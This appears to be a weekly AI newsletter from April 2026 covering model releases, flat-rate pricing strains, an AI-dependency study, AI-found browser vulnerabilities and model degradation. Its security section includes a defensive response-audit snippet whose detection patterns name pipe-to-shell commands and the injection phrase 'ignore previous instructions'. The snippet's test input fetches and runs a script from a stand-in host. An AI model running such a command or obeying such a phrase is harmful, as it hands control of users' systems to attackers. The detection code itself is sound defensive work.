April 26, 2026

Week 17, 2026

Papers, releases, and things you might have missed.

GPT-5.5, DeepSeek V4, Kimi K2.6, and Xiaomi MiMo V2.5 Pro all shipped within four days. The same week, Alibaba released Qwen3.6-27B, a small open-source coding model that performs roughly as well as the best paid models did a year ago and runs on a laptop.

GitHub paused new Copilot Individual signups and is moving to token-based billing. Anthropic ran a brief A/B test pulling Claude Code from the $20 Pro tier. Meta announced it will record employees’ keystrokes and mouse activity to train its agents, the same week it laid off 8,000 staff and committed $115–135B to AI infrastructure. Anthropic published a postmortem confirming weeks of silent degradation in hosted Claude models. Sony’s table-tennis robot beat ITTF-ranked players in a Nature cover paper. Mozilla patched 271 Firefox bugs found by Anthropic’s Mythos preview.


The Open Frontier Caught Up to the Closed Frontier

Anthropic released Claude Opus 4.7 on April 16. OpenAI released GPT-5.5 seven days later; it scored 82.7% on a major coding benchmark. The widely quoted “Senior Engineer Benchmark” headline number, it turns out, is what you get when Opus 4.7 and GPT-5.5 work together as a pipeline (one plans, the other executes), not GPT-5.5 alone. DeepSeek V4 shipped April 24, freely downloadable under an MIT license. Kimi K2.6 is now the top-ranked open-source model on the Artificial Analysis index, sitting just behind the proprietary flagships from Anthropic, Google, and OpenAI. Xiaomi’s MiMo V2.5 Pro rounded out the week.

The more important release calendar may have been the open one. Llama 4 Scout shipped earlier this month with the largest context window of any model, open or closed — large enough to fit a year of email threads or an entire codebase in a single prompt. Gemma 4 is freely licensed and handles images, video, and audio alongside text. Alibaba’s Qwen3.6-27B matches what the leading paid coding models could do a year ago, while staying small enough to run on a laptop. PrismML Bonsai compresses an 8-billion-parameter model down to 1.15 GB — about the size of a movie — for phones and other small devices.
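A quick sanity check on that last number, assuming the 1.15 GB figure covers all 8 billion weights (the reporting doesn’t break this down): it works out to just over one bit per parameter, versus the 16 bits per weight models typically train at.

```python
# Back-of-envelope: what 8B parameters in 1.15 GB implies per weight.
# Assumes the 1.15 GB covers all weights; decimal gigabytes assumed.
params = 8e9
size_bytes = 1.15e9

bits_per_param = size_bytes * 8 / params
print(f"{bits_per_param:.2f} bits per parameter")  # ~1.15

# For contrast, the same model stored at common precisions:
for name, bits in [("fp16", 16), ("int8", 8), ("int4", 4)]:
    print(f"{name}: {params * bits / 8 / 1e9:.1f} GB")  # 16.0, 8.0, 4.0
```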

The supply-side story is no longer hypothetical. Cursor confirmed this week that its new Composer 2 model is built on top of Kimi K2.5, a fact disclosed only after users found Moonshot’s model ID in the code. A major Western coding tool’s flagship model is a Chinese open-weights base.

Picking a model is no longer a once-a-year decision. The cheapest near-frontier option is increasingly an open-source one you run yourself, or that the tool you’re paying for is already running for you under the hood.


Flat-Rate AI Pricing Is Breaking

GitHub paused new Copilot Individual signups on April 20 after weekly operating costs reportedly doubled. Internal documents say Copilot users will be moved to token-based billing starting in June. Anthropic ran a brief A/B test removing Claude Code from the $20 Pro plan. The test hit about 2% of new signups and was reverted the same day, but it happened.

The math behind it is simple. AI agents now string together about twenty tool calls per task and run for hours. A single autonomous coding session can use more compute than an entire week of chat. Flat-rate plans subsidized chat. They don’t subsidize agents.
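Here’s that arithmetic as a sketch. Only the ~20 tool calls per task comes from the reporting; every other number is an assumption for illustration.

```python
# Illustrative only: every number except the ~20 tool calls is an assumption.
TOKENS_PER_CHAT_TURN = 2_000         # assumed prompt + response
CHAT_TURNS_PER_WEEK = 100            # assumed heavy chat user

TOOL_CALLS_PER_TASK = 20             # from the reporting above
TOKENS_PER_TOOL_CALL = 15_000        # assumed: context is re-sent on each step

week_of_chat = CHAT_TURNS_PER_WEEK * TOKENS_PER_CHAT_TURN       # 200,000 tokens
one_agent_session = TOOL_CALLS_PER_TASK * TOKENS_PER_TOOL_CALL  # 300,000 tokens

print(f"week of chat:      {week_of_chat:,} tokens")
print(f"one agent session: {one_agent_session:,} tokens")
```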

Pair this with the open-source wave above. As flat-rate prices rise toward what these workloads actually cost, the question for any team with the infrastructure to run a model themselves becomes whether to pay $200 per seat per month for metered access, or run something like Qwen on hardware they already have. The economics now favor the second answer in more cases than they did a month ago.
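The break-even calculation is short enough to write down. Only the $200 seat price comes from the paragraph above; the rest are placeholder numbers to swap for your own.

```python
# Hypothetical team: only the $200/seat figure comes from the reporting.
seats = 25
metered_monthly = seats * 200                  # $5,000/month for hosted access

gpu_cost, gpu_lifetime_months = 30_000, 36     # assumed self-host hardware, amortized
power_and_ops_monthly = 700                    # assumed electricity + maintenance
self_host_monthly = gpu_cost / gpu_lifetime_months + power_and_ops_monthly

print(f"metered:   ${metered_monthly:,.0f}/mo")
print(f"self-host: ${self_host_monthly:,.0f}/mo")  # ~$1,533/mo under these assumptions
```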


A Controlled Study Quantified Short-Term AI Dependency

Researchers at CMU, Oxford, MIT, and UCLA ran an experiment with 1,222 people. The setup was straightforward: some participants got AI help on math reasoning and reading comprehension tasks for about ten minutes; others worked through the same material without it. When researchers then took the AI away, the people who’d just used it performed worse on the next round of problems than the people who’d never had AI in the first place. They also gave up more often on hard questions. The authors think AI conditions people to expect instant answers, which makes them less willing to push through difficulty on their own.

Two adjacent papers shipped this week: The LLM Fallacy gives a name to the phenomenon of people mistaking AI-generated output for their own skill, and Agentivism proposes a teaching framework aimed specifically at countering cognitive atrophy from AI overreliance.

This continues a thread that opened a month ago: Wharton’s “cognitive surrender” finding (80% of people follow AI answers even when those answers are wrong), and Stanford’s work on AI models telling users what they want to hear rather than what’s true. But this week’s evidence is sharper. The earlier studies asked people about their own habits. This one measures performance directly, after just ten minutes.


Defenders Are Responding to AI Vulnerability Finders

Mozilla patched 271 Firefox vulnerabilities found by Anthropic’s unreleased Mythos preview model — twelve times what Opus 4.6 turned up on the same browser. Mythos’s headline 27-year-old vulnerability was in core internet networking code in OpenBSD, not Firefox; same evaluation, separate target. The UK’s AI Safety Institute confirmed Mythos completed an autonomous 32-step cyber-attack simulation in 3 of 10 attempts.

What’s new this week is the defender response. OpenAI launched GPT-5.4-Cyber for defensive security work on April 14, then announced a $25K bug bounty for anyone who can find a single prompt that gets GPT-5.5 to ignore its biosecurity filters across multiple test questions. Meanwhile, researchers at UC Santa Barbara found that 9 of 428 third-party services that sit between apps and AI models are actively slipping malicious code into the responses they pass back. Most teams aren’t even checking that layer.

The same AI capability that finds 27-year-old bugs is also the most scalable attack tool ever built. And if your app talks to AI through a middleman service, that middleman is now part of your security perimeter whether you’ve checked it or not.
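Checking that layer doesn’t have to be elaborate. A minimal sketch of a response audit for anything that came back through a relay; the patterns below are illustrative heuristics, not a vetted ruleset.

```python
import re

# Illustrative red flags for model responses relayed by a third-party service.
# A real deployment would use a maintained ruleset, not this toy list.
SUSPICIOUS = [
    re.compile(r"curl\s+\S+\s*\|\s*(?:sh|bash)"),               # pipe-to-shell
    re.compile(r"eval\s*\(\s*atob\s*\("),                       # obfuscated JS eval
    re.compile(r"ignore (?:all|previous) instructions", re.I),  # injection phrasing
]

def audit_relayed_response(text: str) -> list[str]:
    """Return the patterns matched in a response that passed through a middleman."""
    return [p.pattern for p in SUSPICIOUS if p.search(text)]

hits = audit_relayed_response("To fix this, run: curl http://evil.example/x | bash")
if hits:
    print("quarantine response, matched:", hits)
```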


Two Narrow Physical Benchmarks Fell to Machines

Sony’s “Ace” robot beat elite human table-tennis players in officially sanctioned matches, reported in a Nature cover paper on April 23. The robot reacts to the ball in about 20 milliseconds and tracks spin rates over 9,000 RPM. Honor’s Lightning humanoid completed the Beijing E-Town half-marathon in 50:26 on April 19, faster than the human world record of about 57 minutes.

These are narrow tests under controlled or semi-controlled conditions. They are also competition-grade performances under official rules. The assumption that physical skill is the last domain where humans will outperform machines took two visible hits in a single week.


Meta Will Record Employees’ Keystrokes to Train Its Agents

Meta announced on April 21 that it will record the keystrokes and mouse activity of remaining staff to generate training data for its agents. The same week: 8,000 layoffs, about 10% of the workforce, and a 2026 spending plan of $115–135 billion on AI infrastructure.

The data and the layoffs are part of one pipeline. Cut humans, capture the work patterns of the survivors, train agents on those patterns. Microsoft’s first-ever buyouts and Google’s claim that 75% of new code is AI-generated are part of the same broader story, but those numbers have been accumulating for a month. The keystroke-logging announcement is the new beat: surveillance as agent-training methodology, on the record, at one of the world’s largest employers.

It used to be the dystopian-corner-case example. Now it’s a published HR policy.


Silent Model Degradation Becomes a Backlash Trigger

Anthropic published a postmortem on April 23 confirming that three separate changes between March and April caused noticeable degradation in hosted Claude models, and that the cause was hidden from users for weeks. The postmortem itself is detailed and unusual. Most providers don’t publish at this level. But it lands inside a broader pattern.

Stanford’s AI Index 2026 — the major annual snapshot of the field — shipped this week. The score the index gives major AI companies for transparency about their own models dropped from an average of 58 (out of 100) to 40 in one year. Meta went from 60 to 31. Mistral went from 55 to 18. Google, Anthropic, and OpenAI have all stopped disclosing how much data they trained on or how long the training took for their latest models. The report’s own phrasing: “the most capable models now disclose the least.”

The EU’s AI Act transparency rules are scheduled to take effect in August 2026. The EU is simultaneously proposing to push the harder compliance deadlines to December 2027. Two regulatory signals heading in opposite directions, while the model behind your API quietly changes.

For anyone building on top of these models, “the model you’re using is not the model that was announced” is now a live operational risk, and teams need to budget time and money to monitor for it.
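The cheapest version of that monitoring is a pinned regression suite run on a schedule. A minimal sketch, assuming a complete(prompt) wrapper around whatever API you call; the prompts and threshold are placeholders.

```python
import statistics
from typing import Callable

# Placeholder suite: each case is (prompt, substring a healthy response must contain).
GOLDEN_CASES = [
    ("What is 17 * 23? Answer with just the number.", "391"),
    ("What is the capital of Australia? One word.", "Canberra"),
]

def pass_rate(complete: Callable[[str], str]) -> float:
    """Fraction of pinned prompts whose responses still contain the expected marker."""
    hits = [marker in complete(prompt) for prompt, marker in GOLDEN_CASES]
    return sum(hits) / len(hits)

def degraded(today: float, history: list[float], tolerance: float = 0.05) -> bool:
    """Flag when today's pass rate drops below the historical mean by more than tolerance."""
    return bool(history) and today < statistics.mean(history) - tolerance
```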


Worth Your Time

  • MCP at 97 million installs a month. MCP (the Model Context Protocol) is the standard way AI models connect to outside tools, files, and services. Anthropic donated it to a new Linux-Foundation-hosted body whose founding members include Block, OpenAI, Google, Microsoft, AWS, and Cloudflare. From around 2 million installs at launch in November 2024 to 97 million a month by March 2026, roughly the speed at which React took over web development. A minimal wire-level sketch of an MCP tool call follows this list.
  • An AI-written paper made it through peer review at ICLR. Sakana AI’s autonomous paper-writing system, AI Scientist-v2, had a paper accepted at a workshop at one of the field’s major conferences, with reviewer scores above the acceptance threshold. Sakana withdrew the paper before final publication, but the acceptance itself stands as the milestone.
  • Tufts robotics research (to be presented at the major robotics conference ICRA in June). A robot using a hybrid system that combines neural networks with rule-based reasoning hit 95% task success on a planning benchmark. A standard neural-network-only baseline scored 34% on the same task while using a hundred times more training energy. The “all you need is more compute” assumption gets harder to defend with that kind of efficiency gap.
  • MIT’s “Crashing Waves vs. Rising Tides” study. Based on more than 17,000 worker evaluations: no sudden displacement, just gradual expansion of what AI can handle. AI hit 65% success on tasks that take humans three to four hours — up from about 50% the year before. Current numbers are likely higher; the study’s measurement window closed in mid-2025.
  • Vercel credential breach traced to a Roblox cheat. A Context.ai employee downloaded malware hidden in a Roblox cheat tool. The attacker used the stolen login tokens to extract limited customer environment variables from Vercel. A supply-chain credential theft that started with a personal device, not a platform outage.
  • Deezer: 44% of daily uploads are AI-generated. Up from essentially nothing two years ago. The ratio is the story; absolute volume hasn’t been disclosed.
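The MCP sketch promised above: on the wire, MCP is JSON-RPC 2.0, and a client asks a server to run a tool via the tools/call method defined in the published spec. The envelope shape below follows the spec; the tool name and arguments are made up.

```python
import json

# Hypothetical tool invocation; "tools/call" is the method MCP's spec defines
# for asking a server to execute one of its advertised tools.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "search_files",  # hypothetical tool name
        "arguments": {"query": "Q1 report", "max_results": 5},
    },
}
print(json.dumps(request, indent=2))
```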